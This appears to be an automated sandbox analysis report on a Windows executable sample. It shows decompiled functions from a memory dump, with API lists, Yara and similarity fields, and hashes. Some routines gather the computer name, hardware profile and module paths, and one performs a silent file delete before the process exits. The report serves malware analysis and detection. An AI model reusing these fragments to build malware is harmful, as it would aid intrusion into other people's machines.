                                                                                                                              0x004149cd
                                                                                                                              0x004149d0
                                                                                                                              0x0041497f
                                                                                                                              0x00414982
                                                                                                                              0x00414988
                                                                                                                              0x0041498f
                                                                                                                              0x004149a0
                                                                                                                              0x00414991
                                                                                                                              0x0041499b
                                                                                                                              0x0041499b
                                                                                                                              0x004149a7
                                                                                                                              0x004149a7
                                                                                                                              0x004149d6
                                                                                                                              0x004149e1

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00404E60: _malloc.LIBCMT ref: 00404E7A
                                                                                                                              • codecvt.LIBCPMTD ref: 00414996
                                                                                                                                • Part of subcall function 00404E60: std::exception::exception.LIBCMT ref: 00404EAF
                                                                                                                                • Part of subcall function 00404E60: std::exception::exception.LIBCMT ref: 00404EC9
                                                                                                                                • Part of subcall function 00404E60: __CxxThrowException@8.LIBCMT ref: 00404EDA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloccodecvt
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3802366972-0
                                                                                                                              • Opcode ID: 9f6699dc5a6218de000214a3575d2ce5ac348e0dc822c7d73c3526bba5149f97
                                                                                                                              • Instruction ID: dfa4c6b68f695d195a3261a03b22ad4cc4c07bdc4f6c79637ebba9ac40f79c8c
                                                                                                                              • Opcode Fuzzy Hash: 9f6699dc5a6218de000214a3575d2ce5ac348e0dc822c7d73c3526bba5149f97
                                                                                                                              • Instruction Fuzzy Hash: 233107B0D14209DFCB04DFA9D941BEEB7B0FB88314F10822AE516B7380D7785940CBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C810, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1029625771-0
                                                                                                                              • Opcode ID: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
                                                                                                                              • Instruction ID: 1d58dfb68342f40b28b35fc8f55cf59418151b06a09c04e22a3330fc5e42e00c
                                                                                                                              • Opcode Fuzzy Hash: 63c73c981d721ed519f396d62da7981b54ec637de26aff86e6c897e05b8272c8
                                                                                                                              • Instruction Fuzzy Hash: 7221FDB5614600AFC748EFA9FE9891677E9F74C301710E63AA609C3270D7B5A841CF6C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040F4A0, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E0040F4A0(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x43149c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x431ac8;
					if( *0x431ac8 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00408F17(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00405A49(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                                                                                                              0x0040f4a5
                                                                                                                              0x0040f4aa
                                                                                                                              0x0040f4c7
                                                                                                                              0x0040f4cc
                                                                                                                              0x0040f4ce
                                                                                                                              0x0040f4d0
                                                                                                                              0x0040f4d2
                                                                                                                              0x0040f4d2
                                                                                                                              0x0040f4d2
                                                                                                                              0x00000000
                                                                                                                              0x0040f4da
                                                                                                                              0x0040f4e3
                                                                                                                              0x0040f4e9
                                                                                                                              0x0040f4eb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f51f
                                                                                                                              0x0040f521
                                                                                                                              0x00000000
                                                                                                                              0x0040f4ed
                                                                                                                              0x0040f4ed
                                                                                                                              0x0040f4f4
                                                                                                                              0x0040f512
                                                                                                                              0x0040f515
                                                                                                                              0x0040f517
                                                                                                                              0x0040f519
                                                                                                                              0x0040f519
                                                                                                                              0x0040f4f6
                                                                                                                              0x0040f4f7
                                                                                                                              0x0040f4fd
                                                                                                                              0x0040f4ff
                                                                                                                              0x0040f4d3
                                                                                                                              0x0040f4d3
                                                                                                                              0x0040f4d5
                                                                                                                              0x0040f4d8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f501
                                                                                                                              0x0040f501
                                                                                                                              0x0040f504
                                                                                                                              0x0040f506
                                                                                                                              0x0040f508
                                                                                                                              0x0040f508
                                                                                                                              0x0040f50e
                                                                                                                              0x0040f50e
                                                                                                                              0x0040f4ff
                                                                                                                              0x00000000
                                                                                                                              0x0040f4ac
                                                                                                                              0x0040f4b0
                                                                                                                              0x0040f4b3
                                                                                                                              0x0040f4b6
                                                                                                                              0x00000000
                                                                                                                              0x0040f4b8
                                                                                                                              0x0040f4bd
                                                                                                                              0x0040f4c6
                                                                                                                              0x0040f4c6
                                                                                                                              0x0040f4b6
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00408822,00000000,?,00000000,00000000,00000000,?,004083FD,00000001,00000214), ref: 0040F4E3
                                                                                                                                • Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 328603210-0
                                                                                                                              • Opcode ID: d82e66436fce21d8571c17326f2ffb424c68f115f354af63cfe6861107ae204b
                                                                                                                              • Instruction ID: 0bcd9a96758ee573beb90f3535d4c7ac3b72da11a871f97e33554206fa416c49
                                                                                                                              • Opcode Fuzzy Hash: d82e66436fce21d8571c17326f2ffb424c68f115f354af63cfe6861107ae204b
                                                                                                                              • Instruction Fuzzy Hash: DA01D431301215ABEB34AF65EC04B673395BBD1364F10863BEC1AEBAD0DB38DC048A58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00412C20, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 92%
                                                                                                                              			E00412C20(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;

				_push(__ecx);
				_v8 = __ecx;
				if(( *(_v8 + 0x1c) & 0x000000ff) != 0) {
					if( *((intOrPtr*)(_v8 + 0x20)) == 0) {
						if( *(_v8 + 4) == 0) {
							 *((intOrPtr*)(_v8 + 0x14)) = 0x1000000;
							return 0;
						}
						SetFilePointer( *(_v8 + 4), _a4 +  *((intOrPtr*)(_v8 + 0x10)), 0, 0); // executed
						return 1;
					}
					if(_a4 <  *((intOrPtr*)(_v8 + 0x28))) {
						 *((intOrPtr*)(_v8 + 0x24)) = _a4;
						return 1;
					}
					 *((intOrPtr*)(_v8 + 0x14)) = 0x30000;
					return 0;
				}
				 *((intOrPtr*)(_v8 + 0x14)) = 0x2000000;
				return 0;
			}




                                                                                                                              0x00412c23
                                                                                                                              0x00412c24
                                                                                                                              0x00412c30
                                                                                                                              0x00412c47
                                                                                                                              0x00412c78
                                                                                                                              0x00412c9c
                                                                                                                              0x00000000
                                                                                                                              0x00412ca3
                                                                                                                              0x00412c8f
                                                                                                                              0x00000000
                                                                                                                              0x00412c95
                                                                                                                              0x00412c52
                                                                                                                              0x00412c68
                                                                                                                              0x00000000
                                                                                                                              0x00412c6b
                                                                                                                              0x00412c57
                                                                                                                              0x00000000
                                                                                                                              0x00412c5e
                                                                                                                              0x00412c35
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26d71604db6fec4be1207dcab1404c9e182b981f92b1460fa6431c5401797251
                                                                                                                              • Instruction ID: 1025bfa3c1fb4726a5c59c84ddd76f85376f96707e6bf9497156914aa1de4f59
                                                                                                                              • Opcode Fuzzy Hash: 26d71604db6fec4be1207dcab1404c9e182b981f92b1460fa6431c5401797251
                                                                                                                              • Instruction Fuzzy Hash: 74113074604204EBDB08CF54D344BDEB7B1AB59300F208189E5055B351D775EE92EB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417A10, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 62%
                                                                                                                              			E00417A10(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t22;

				if(_a4 != 0) {
					_v12 = _a4;
					if( *_v12 == 2) {
						_v8 =  *((intOrPtr*)(_v12 + 4));
						_t22 = E00417880(_v8); // executed
						 *0x432ab0 = _t22;
						_v20 = _v8;
						_v16 = _v20;
						if(_v16 == 0) {
							_v28 = 0;
						} else {
							_v28 = E00404240(_v16, 1);
						}
						_v24 = _v12;
						_push(_v24);
						E00404E04();
						return  *0x432ab0;
					}
					 *0x432ab0 = 0x80000;
					return 0x80000;
				}
				 *0x432ab0 = 0x10000;
				return 0x10000;
			}










                                                                                                                              0x00417a1a
                                                                                                                              0x00417a30
                                                                                                                              0x00417a39
                                                                                                                              0x00417a52
                                                                                                                              0x00417a58
                                                                                                                              0x00417a5d
                                                                                                                              0x00417a65
                                                                                                                              0x00417a6b
                                                                                                                              0x00417a72
                                                                                                                              0x00417a83
                                                                                                                              0x00417a74
                                                                                                                              0x00417a7e
                                                                                                                              0x00417a7e
                                                                                                                              0x00417a8d
                                                                                                                              0x00417a93
                                                                                                                              0x00417a94
                                                                                                                              0x00000000
                                                                                                                              0x00417a9c
                                                                                                                              0x00417a3b
                                                                                                                              0x00000000
                                                                                                                              0x00417a45
                                                                                                                              0x00417a1c
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3fc4df5d77e438f88af4ac30830dbaf5f2beac3102faba5a478d2412ee39990
                                                                                                                              • Instruction ID: 679793f8ccfb25e98cb5af2dab38616610ecc47be8336f414092fb61571c7ccd
                                                                                                                              • Opcode Fuzzy Hash: f3fc4df5d77e438f88af4ac30830dbaf5f2beac3102faba5a478d2412ee39990
                                                                                                                              • Instruction Fuzzy Hash: 0B11E5B0E08208EFCB14EF94D9517AEBBB1BB44344F2041AAE9056B350D7796EC0DF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417A10, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 62%
                                                                                                                              			E00417A10(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _t22;
				intOrPtr _t25;

				if(_a4 != 0) {
					_v12 = _a4;
					if( *_v12 == 2) {
						_v8 =  *((intOrPtr*)(_v12 + 4));
						_t22 = E00417880(_v8); // executed
						 *0x432ab0 = _t22;
						_v20 = _v8;
						_v16 = _v20;
						if(_v16 == 0) {
							_v28 = 0;
						} else {
							_v28 = E00404240(_v16, 1);
						}
						_v24 = _v12;
						_push(_v24);
						E00404E04();
						_t25 =  *0x432ab0; // 0x0
						return _t25;
					}
					 *0x432ab0 = 0x80000;
					return 0x80000;
				}
				 *0x432ab0 = 0x10000;
				return 0x10000;
			}











                                                                                                                              0x00417a1a
                                                                                                                              0x00417a30
                                                                                                                              0x00417a39
                                                                                                                              0x00417a52
                                                                                                                              0x00417a58
                                                                                                                              0x00417a5d
                                                                                                                              0x00417a65
                                                                                                                              0x00417a6b
                                                                                                                              0x00417a72
                                                                                                                              0x00417a83
                                                                                                                              0x00417a74
                                                                                                                              0x00417a7e
                                                                                                                              0x00417a7e
                                                                                                                              0x00417a8d
                                                                                                                              0x00417a93
                                                                                                                              0x00417a94
                                                                                                                              0x00417a9c
                                                                                                                              0x00000000
                                                                                                                              0x00417a9c
                                                                                                                              0x00417a3b
                                                                                                                              0x00000000
                                                                                                                              0x00417a45
                                                                                                                              0x00417a1c
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3fc4df5d77e438f88af4ac30830dbaf5f2beac3102faba5a478d2412ee39990
                                                                                                                              • Instruction ID: 679793f8ccfb25e98cb5af2dab38616610ecc47be8336f414092fb61571c7ccd
                                                                                                                              • Opcode Fuzzy Hash: f3fc4df5d77e438f88af4ac30830dbaf5f2beac3102faba5a478d2412ee39990
                                                                                                                              • Instruction Fuzzy Hash: 0B11E5B0E08208EFCB14EF94D9517AEBBB1BB44344F2041AAE9056B350D7796EC0DF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B160, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041B17A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentProfile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2104809126-0
                                                                                                                              • Opcode ID: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
                                                                                                                              • Instruction ID: 04581f43b4f816d405aec1f7429879156f298d46bcd32117c8786c3065179c69
                                                                                                                              • Opcode Fuzzy Hash: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
                                                                                                                              • Instruction Fuzzy Hash: 1301E171A00119DBDB18DF64DD55F99B7B8BB08300F0091AAA94AD7280DE749A84CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A600, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 514040917-0
                                                                                                                              • Opcode ID: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
                                                                                                                              • Instruction ID: 1d1b37563283dd2e0880c91a50c3a5397273ca56bd8ac06d4b12f4a0aad7b886
                                                                                                                              • Opcode Fuzzy Hash: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
                                                                                                                              • Instruction Fuzzy Hash: D1F03074A0020CEFDB08EFA4DD4ABED77B4FB08704F1015A9EA1597290D6B46A84DB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B2E0, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E0041B2E0() {
				signed int _v8;
				char _v276;
				long _v280;
				signed int _t7;
				int _t10;
				CHAR* _t11;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x4301f4; // 0xe687535
				_v8 = _t7 ^ _t20;
				_v280 = 0x104;
				_t10 = GetComputerNameA( &_v276,  &_v280); // executed
				if(_t10 != 0) {
					_t11 =  &_v276;
				} else {
					_t11 =  *0x4322d4;
				}
				return E00404354(_t11, _t13, _v8 ^ _t20, _t17, _t18, _t19);
			}














                                                                                                                              0x0041b2e9
                                                                                                                              0x0041b2f0
                                                                                                                              0x0041b2f3
                                                                                                                              0x0041b30b
                                                                                                                              0x0041b313
                                                                                                                              0x0041b31e
                                                                                                                              0x0041b315
                                                                                                                              0x0041b315
                                                                                                                              0x0041b315
                                                                                                                              0x0041b331

                                                                                                                              APIs
                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041B30B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ComputerName
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3545744682-0
                                                                                                                              • Opcode ID: eebfe3b019206971c170a9ee6f309522c52ae243993ee352773efe4b871ee841
                                                                                                                              • Instruction ID: 9c951603334a3196eedb2f5d8ce0062fa3e7763144f1ac2ad3b1ae841299b97e
                                                                                                                              • Opcode Fuzzy Hash: eebfe3b019206971c170a9ee6f309522c52ae243993ee352773efe4b871ee841
                                                                                                                              • Instruction Fuzzy Hash: 8BF0657090010C8BCB1CDF64DD42AE9B3F8EB08700F4001EA9A2993240D7749A88DB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040B7F2, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0040B7F2(signed int __eax, signed int** __ecx, signed int* __esi) {
				signed int _t7;
				signed int** _t9;
				void* _t12;
				void* _t14;
				signed int* _t15;

				_t15 = __esi;
				_t9 = __ecx;
				_t7 = __eax;
				if((__ecx[3] & 0x00000040) == 0 || __ecx[2] != 0) {
					_t5 =  &(_t9[1]);
					 *_t5 = _t9[1] - 1;
					if( *_t5 < 0) {
						_t7 = E0040B68E(_t12, _t14, _t7, _t9); // executed
					} else {
						 *( *_t9) = _t7;
						 *_t9 =  &(( *_t9)[0]);
						_t7 = _t7 & 0x000000ff;
					}
					if(_t7 != 0xffffffff) {
						goto L7;
					} else {
						 *_t15 =  *_t15 | _t7;
						return _t7;
					}
				} else {
					L7:
					 *_t15 =  *_t15 + 1;
					return _t7;
				}
			}








                                                                                                                              0x0040b7f2
                                                                                                                              0x0040b7f2
                                                                                                                              0x0040b7f2
                                                                                                                              0x0040b7f6
                                                                                                                              0x0040b7fe
                                                                                                                              0x0040b7fe
                                                                                                                              0x0040b801
                                                                                                                              0x0040b813
                                                                                                                              0x0040b803
                                                                                                                              0x0040b805
                                                                                                                              0x0040b807
                                                                                                                              0x0040b809
                                                                                                                              0x0040b809
                                                                                                                              0x0040b81d
                                                                                                                              0x00000000
                                                                                                                              0x0040b81f
                                                                                                                              0x0040b81f
                                                                                                                              0x0040b821
                                                                                                                              0x0040b821
                                                                                                                              0x0040b822
                                                                                                                              0x0040b822
                                                                                                                              0x0040b822
                                                                                                                              0x0040b824
                                                                                                                              0x0040b824

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __flsbuf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2056685748-0
                                                                                                                              • Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                                                                                                              • Instruction ID: 48746035c8d98e9752f31ab4b8e97cf8c644e75d84aad8d493d03b062999833f
                                                                                                                              • Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                                                                                                              • Instruction Fuzzy Hash: 13E09A314011008ACA241F20C0062327BA8DB4172AF34CAAFD5909A1F3D73F8443DAAC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A380, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0041A39D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1514166925-0
                                                                                                                              • Opcode ID: 40336c8259512cce58f89f8d61b1b1879afaacceea97e291bf12fce08afdded2
                                                                                                                              • Instruction ID: 3c8f1d79d87c84db0684a3e850628d3effbe9715211d779297b264c74426fdcd
                                                                                                                              • Opcode Fuzzy Hash: 40336c8259512cce58f89f8d61b1b1879afaacceea97e291bf12fce08afdded2
                                                                                                                              • Instruction Fuzzy Hash: A9E012303442086BE7408E65DC41FA637E8A785740F108419F91DCB280D671E9559B65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A6E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041A6E0(CHAR* _a4) {
				signed int _v8;
				intOrPtr _v12;
				long _t9;

				_t9 = GetFileAttributesA(_a4); // executed
				_v8 = _t9;
				if(_v8 == 0xffffffff || (_v8 & 0x00000010) != 0) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				return _v12;
			}






                                                                                                                              0x0041a6ea
                                                                                                                              0x0041a6f0
                                                                                                                              0x0041a6f7
                                                                                                                              0x0041a70a
                                                                                                                              0x0041a701
                                                                                                                              0x0041a701
                                                                                                                              0x0041a701
                                                                                                                              0x0041a717

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0041A6EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 9def5948c8f160d00dc71cd55bfd5ac5a8e15a12c7ec24a005979c101a2a598e
                                                                                                                              • Instruction ID: e03e7f51ea95acc2c6fc920af098f74b403825f68660cfe25e203b6a8b32b8d6
                                                                                                                              • Opcode Fuzzy Hash: 9def5948c8f160d00dc71cd55bfd5ac5a8e15a12c7ec24a005979c101a2a598e
                                                                                                                              • Instruction Fuzzy Hash: 26E08634D0530CEBCB10DFE4D9586DDBBB4EB01310F204299D8155B3C0D3349BA68B46
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041F540, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041F540(intOrPtr _a4) {
				intOrPtr _v10;
				struct _SHFILEOPSTRUCT _v14;
				struct _SHFILEOPSTRUCT _v18;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _SHFILEOPSTRUCT _v36;
				int _t12;

				_v36 = 0;
				_v32 = 3;
				_v28 = _a4;
				_v24 = 0x42949b;
				_v20 = 0x414;
				_v18 = 0;
				_v14 = 0;
				_v10 = 0x4294ba;
				_t12 = SHFileOperation( &_v36); // executed
				return _t12;
			}












                                                                                                                              0x0041f546
                                                                                                                              0x0041f54d
                                                                                                                              0x0041f557
                                                                                                                              0x0041f55a
                                                                                                                              0x0041f566
                                                                                                                              0x0041f56a
                                                                                                                              0x0041f571
                                                                                                                              0x0041f578
                                                                                                                              0x0041f583
                                                                                                                              0x0041f58c

                                                                                                                              APIs
                                                                                                                              • SHFileOperation.SHELL32(00000000), ref: 0041F583
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileOperation
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3080627654-0
                                                                                                                              • Opcode ID: d78f0f88244affa22c22d943ca27d22b1a55c3b15ba671f590ec3ee1307765fa
                                                                                                                              • Instruction ID: 882c292eb77013e31a5bbbb2e8fed08838e142fcd70b20bfa47ffb38cd912db5
                                                                                                                              • Opcode Fuzzy Hash: d78f0f88244affa22c22d943ca27d22b1a55c3b15ba671f590ec3ee1307765fa
                                                                                                                              • Instruction Fuzzy Hash: 31E0C2B0D0421C9BDB00EF94D8587AEBBB4FB48304F408659D9046B240D3B986098BD9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421400, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00421400() {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t8;

				E00423050(0x4326f8); // executed
				E00419700(0x4326f8); // executed
				_t3 = E0041F4A0(); // executed
				_t9 = _t3;
				if(_t3 != 0) {
					_t4 = E0041B700(0x4326f8, _t8, _t9); // executed
					_t10 = _t4;
					if(_t4 != 0) {
						E00420BE0(_t6, _t10); // executed
					}
				}
				ExitProcess(0);
			}







                                                                                                                              0x00421408
                                                                                                                              0x0042140d
                                                                                                                              0x00421412
                                                                                                                              0x00421417
                                                                                                                              0x00421419
                                                                                                                              0x0042141b
                                                                                                                              0x00421420
                                                                                                                              0x00421422
                                                                                                                              0x00421424
                                                                                                                              0x00421424
                                                                                                                              0x00421422
                                                                                                                              0x0042142b

                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 0042142B
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C1F
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C35
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C4B
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C61
                                                                                                                                • Part of subcall function 00420BE0: _memset.LIBCMT ref: 00420C77
